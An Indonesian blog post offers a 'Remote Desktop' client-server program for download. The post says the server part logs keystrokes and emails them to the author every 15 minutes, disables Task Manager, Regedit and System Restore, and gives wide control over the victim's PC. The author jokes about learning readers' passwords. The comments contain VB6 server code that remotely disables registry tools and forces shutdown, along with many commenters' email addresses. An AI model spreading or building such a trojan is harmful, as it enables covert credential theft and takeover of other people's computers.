Sunday, August 1, 2010

Remote Desktop - Pengontrol Komputer Orang Lain

Aplikasi ini dibuat HANYA dengan tujuan pembelajaran mengenai Pemrograman Remote Desktop Client - Server, dengan sudut pandang dari sisi hitamnya. Karena disatu sisi terdapat fasilitas yang menguntungkan bagi si pemegang aplikasi Client namun disisi lain dapat merugikan orang yang komputernya berjalan aplikasi server.

Harap Diperhatikan bahwa semua bentuk kerugian pada anda atau kerugian pada pihak lain yang diakibatkan penggunaan program "REMOTE DESKTOP" ini, bukan merupakan tanggung jawab saya sebagai penyusun program. Semua bentuk kerugian tersebut sepenuhnya menjadi tanggung jawab anda yang menjalankan aplikasi "REMOTE DESKTOP". Jika anda tidak setuju dengan hal ini lebih baik jangan gunakan aplikasi ini dan hapus dari komputer anda melalui tombol "Clear Your PC" yang ada pada form login aplikasi "Client.exe".

Tetapi jika anda setuju, maka harus diingat bahwa jika aplikasi "Server" berjalan di komputer anda dan anda terhubung dengan internet serta jika website untuk mengirim email secara anonim dapat diakses serta Kontrol Check Untuk memperbolehkan pengiriman e-mail ke VBasicCode anda centang maka otomatis setiap 15 menit "server" akan mengirim informasi ke account email saya, sehingga saya dapat mengambil keuntungan dari hasil keylogger yang tertanam di "server".
HATI-HATI JANGAN SAMPAI SAYA MENGETAHUI PASSWOR ANDA!!!.

Aplikasi Ini Dibuat dan Di Coba Pada System Windows XP SP 2, kadang masih dijumpai Bugs yaitu, Bugs pada proses Pengiriman email yang kadang gagal kadang berhasil, hal ini disebabkan karena web yang dipilih untuk pengiriman secara anonim kadang tidak dapat diakses sehingga email dari server tidak terkirim. Untuk mengatasi hal ini maka download dan gunakan aplikasi emailbomber yang telah saya upload sebelumnya untuk mengetahui webserver yang memiliki fasilitas pengiriman e-mail Anonim. Jika telah mendapatkan webserver dengan fasilitas ini maka tulis secara lengkap alamat webserser tersebut ke dalam file "Webserver.txt" yang secara otomatis akan dihasilkan jika anda menjalankan "Client.exe".

Fitur
Fitur yang ada pada aplikasi ini adalah:
Cek IP Address
Otomtatis Kirim e-mail
Cek Pengiriman e-mail
Update WebServer e-mail Anonim
ScreenShot
Keylogger
Upload Download
Chating
Pesan Pop-Up
Shutdown, Restart, Log Off
Minimize Semua Window
Show Hide Start Button
Enable Disable Start Button
Ubah Resolusi Monitor
Balik Layar Monitor
Wallpaper
Screen Saver
Open Close CD-Rom
Disable Enable Task Manager
Disable Enable Regedit
Show Hide Taskbar
Show Hide Clock
Kunci File executable
Disable Enable System Restore
Ubah Owner
Ubah Organization
Show Hide Icon Desktop
Get Versi Windows
Open Directory
Delete
Remove
Empty
Kill
Run
Mouse
View Time Server
Timer Connect/DisConnect Internet
Timer Shutdown
Tweak Registry
Close Windows Process
Del Windows Process

Pada akhirnya saya ucapkan terimakasih telah sudi membaca dan memnggunakan aplikasi ini. Semoga bermanfaat dan menambah Pengetahuan.

Salam.

54 comments:

  1. Thanks komentnya Mas sugeng..
    Untuk aplikasi ini semua antivirus akan mendeteksi bahwa aplikasi termasuk kategori dalam virus (karena salah satu code mengandung code copyfile ke folder winsys di system32, otomatis berjalan distartup, dll) tapi suer tidak ada maksud untuk membuat virus.
    Semula program ini saya buat Hanya bertujuan bagaimana siswa-siswi saya saat pelajaran ekstra komputer dapat saya kontrol aktifitasnya sehingga pelajaran akan berlangsung optimal.

    ReplyDelete
  2. mas mbok saya dikasih tau cara buat remote registry (client-sever) yang fungsi nya cuma untuk mengaktifkan & menonaktifkan registry computer client.,. dengan VB
    saya ada tugas dikampus ane.,
    saya belum pernah diajari VB & Client-server udah dikasih tugas kaya gini.,.
    mohon bantuannya

    ReplyDelete
  3. Terimakasih telah menulis komentar Mas"catatankecilku",untuk permintaan sudah saya jawab dengan membuat postingan dengan judul Basic Client-Server.
    Semoga bermanfaat.

    ReplyDelete
  4. mas aq tertarik .. tpi link downloadnya mana yang mana mas ... ??thank's..

    ReplyDelete
  5. Thanks Mas Wahed, Untuk link download berada pada banner atas bertuliskan "Menu Link Download" dibawah banner tengkorak.Tinggal klik pada nama aplikasi/project yang ingin didownload.

    ReplyDelete
  6. mas q ajrin buat program shutdown komputer lain dijaringan(LAN)dengan VB 6.0,q awam banget soale,tugas dari dosen nih... klo g bisa,nilai g kluar :(

    ReplyDelete
  7. @Mas ryan_doank: Saya pernah sih membuat program seperti itu tetapi setelah saya coba gagal, padahal dalam buku tersebut dikatakan berhasil lho..mungkin diakibatkan system security yang berbeda.
    tetapi jika menggunakan software/aplikasi "Remote" maka kemungkinan berhasilnya cukup tinggi, yakelemahannya kita harus menanam aplikasi pada komputer target terlebih dahulu.
    Mas Ryan bisa download project pada link dipostingan "Basic Client - Server".
    Kemudian tambahkan komponen dan kodesepertidi bawah ini:

    Pada Client tambahkan CommandButton berinama CmdShutDown
    Private Sub CmdShutDown_Click()
    WscClient.SendData "shutdown"
    End Sub

    Pada Server tambahkan kode
    Private Sub WskServer_DataArrival(ByVal bytesTotal As Long)
    Dim date_primite As String
    Dim Vector() As String
    Dim regrun
    Set regrun = CreateObject("WScript.Shell")
    WskServer.GetData date_primite
    Vector = Split(date_primite, "|")
    Select Case Vector(0)
    Case "disablereg"
    regrun.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
    regrun.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
    WskServer.SendData "laporan|" + "Laporan dari Server:""Registry Server tidak dapat dibuka."""
    Case "enablereg"
    regrun.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
    regrun.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
    WskServer.SendData "laporan|" + "Laporan dari Server: ""Registry Server sudah dapat dibuka kembali."""
    Case "shutdown"
    Shell "shutdown.exe -r -t 0", vbHide
    End Select
    End Sub

    ReplyDelete
  8. makasih mas...
    tapi bagaimana dengan script dari ini
    http://www.docstoc.com/docs/20206557/PROGRAM-MEMATIKAN-KOMPUTER-LAWAN-%28LAN%29-DENGAN-VISUAL-BASIC-60
    sepertinya,ini juga bellum lengkap juga ya??

    ReplyDelete
  9. @Newbie Hacker: Hehehe.. Lha itu di bawah Banner Tengkorak adatulisan "Menu Link Download" Tinggal Pilih Project/Aplikasi yang diinginkan.

    ReplyDelete
  10. kok gak ketemu joga tulisan "Menu Link Download" ?? alamat nya aja gan

    ReplyDelete
  11. Menu linknya saya buat dari Flash (swf).
    Ini linknya ^_^
    http://www.ziddu.com/download/10981312/RemoteDesktop.rar.html

    ReplyDelete
  12. cara download di ZIDU setelah memasukkan Verification Code maka jangan klik Tombol DOWNLOAD melainkan tekan ENTER.
    Jika KLIK DOWNLOAD maka Gagal terdownloadfile tersebut.

    ReplyDelete
  13. mas, cara kirim gambar/image pake winsock di vb6 gmana??
    q coba

    Winsock1.SendData Image1.picture

    kok gx bisa??

    ReplyDelete
  14. mas bisa buatin n kirim tutorial pembuatanx ga? ?
    selengkap - lengkapx..
    stelah membacax..
    q pngen bnget blajar mmbwtx dri awal mas? ?
    email q abi.jrocks@gmail.com
    kita bicarain lbh lanjut mas klo mank ada biaya2x...

    ReplyDelete
  15. Mas @Poenya Achmad: Untuk mengirim image melalui komponen winsock yang kita tambahkan di form kemungkinan gagal atau sangatlambat karena gambar dan teks jelas berbeda.
    Mas Asep: maaf Untuk tutorial saya tidak sempat membuatnya karena banyak fiturnya hehehe..Tapi untuk source codenya tentu saja ada.
    Oke nanti saya email Mas abi atau Mas Terserah Aja ^_^.

    ReplyDelete
  16. 0oo... y
    kLo yang "View Screenshot" n "Take save screenshot 'tu scrip'a gmna???

    ReplyDelete
  17. mantabs mas bro.....
    terus berkarya dan jangan lupa berbagi, he...

    ReplyDelete
  18. mantabb mz brooo....
    tukeran link mz bro..
    http://marsupilamie.wordpress.com/
    ta tnggu linkback'a...
    matur suwun..

    ReplyDelete
  19. masbro, mau tanya ada ga source code sederhana menggerakkan mouse komputer lawan dari server,,, please help me masbro...

    ReplyDelete
  20. Kirain ama source codenya sob...ane butuh source codenya sob.lg nambah" ilmu.kalo boleh ane mnta source code nya sob.d email sy z..cho_3xx@yahoo.co.id

    ReplyDelete
  21. Mas, tolong di post cara bikin "peter answer" di VB..thx

    ReplyDelete
  22. wow kerennn..
    boleh minta project & source code nya om ?? ^^

    ReplyDelete
  23. bener tak cari gak ada link downloadnya mas...

    ReplyDelete
  24. Link Download:

    maksud pak VBasicCode bukan dibawahnya tapi diatasnya gambar tengkorak ada tulisan "Klik Disini Untuk Melihat Semua Link Download"

    ReplyDelete
  25. KAGAK BISA SEMUA GAN, HAMPIR 2 JAM GAK BERHASIL DOWNLOAD, JANGAN SIMPAN DI ZIDDU GAN

    ReplyDelete
  26. gan saya minta source codenya dong.. kirim ke e-mail saya gan..
    faizmuhadi@ymail.com

    ReplyDelete
  27. bikin turtor nya dong

    it is so coll man

    ReplyDelete
  28. gan kirim source code ke email gw donk,,,
    panic_at_school07@yahoo.com
    terima kasih gan..
    ditunggu

    ReplyDelete
  29. gan minta project sama source code nya dong. urgent buat tugas kuliah soalnya. please email ke sonyarifin65@yahoo.com thanks

    ReplyDelete
  30. klo mw dnlot lewt ziddu, uncheck "Download with ziddu accelerator and get recommended offers." sbelum mnekan tombol download

    ReplyDelete
  31. saya pingen baljar buat knyk gitu gan bisa di sharing gan source codenya hehe
    azam.netcom@gmail.com

    ReplyDelete
  32. wah ini trojan gun hati2 data anda di culik

    ReplyDelete
  33. wah telat amat gua dapat ne Tutorial...
    gan sharingkan dunk source codeNya
    kirim disini ya mas : masterpool1111@yahoo.com
    di tunggu ya mass :D

    ReplyDelete
  34. gan ane telat minta
    ane pgen nyoba bikin gan , kirimin source code nya gan
    kirim ke email ane gan
    thacooljohn@gmail.com
    ane tunggu gan - makasih gan

    ReplyDelete
  35. gan boleh sharing ilmu leboh dalam g y
    boleh donk kirim sourcenya
    email aja langsung gan sysron27@yahoo.com

    thx before y gan

    ReplyDelete
  36. gan kirim source codenya dong asr086@gmail.com

    thnk's

    ReplyDelete
  37. gan saya minta source codenya dong.. kirim ke e-mail saya gan..
    susilo.harry@ymail.com

    ReplyDelete
  38. gimsi0103@naver.com SourceCode Please

    ReplyDelete
  39. This comment has been removed by the author.

    ReplyDelete
  40. gimsi0103@naver.com SourceCode Please

    ReplyDelete
  41. This comment has been removed by the author.

    ReplyDelete
  42. This comment has been removed by the author.

    ReplyDelete
  43. boleh kirim source code nya tidak mas, untuk tugas kuliah nih di kampus, tolong kirim di rilaraemel@gmail.com ya mas

    ReplyDelete
  44. This comment has been removed by the author.

    ReplyDelete
  45. This comment has been removed by the author.

    ReplyDelete
  46. maaf sebelumnya, bisa minta tolong, skrip aplikasinya bisa di krimkan lewat email saya, soalnya saya lagi butuh, krim disini ya: saipinipin4@gmail.com

    ReplyDelete
  47. maaf sebelumnya, bisa minta tolong, skrip aplikasinya bisa di krimkan lewat email saya, soalnya saya lagi butuh, kirim disini ya:eddy94kurniawan@gmail.com

    terima kasih

    ReplyDelete
  48. Minta source nya dong mas.
    dedyfabregas@gmail.com

    Terima kasih...

    ReplyDelete